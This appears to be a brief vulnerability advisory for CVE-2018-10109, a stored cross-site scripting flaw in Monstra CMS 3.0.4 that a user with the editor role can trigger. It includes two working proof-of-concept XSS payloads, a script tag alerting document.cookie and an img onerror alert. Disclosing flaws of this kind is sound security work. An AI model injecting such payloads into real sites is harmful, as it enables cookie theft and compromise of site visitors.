Monstra cms 3.0.4 – Persitent Cross-Site Scripting

Authors:Wenming Jiang         Risk:High

CVE:CVE-2018-10109           0day:Cross-Site Scripting

0day -id:0DAY-10109           Date:2018-04-24

Description

Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload in the content section of a new page in the blog catalog.

 Exploit

# Exploit Title: Monstra cms 3.0.4 - Persitent Cross-Site Scripting
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: php 5.6, apache2.2.29, macos 10.12.6
# CVE :CVE-2018-10109

Exploit Code:

<script>alert(document.cookie)</script>
or
<img src=1 onerror=alert(/xss/) >

 

Leave a Reply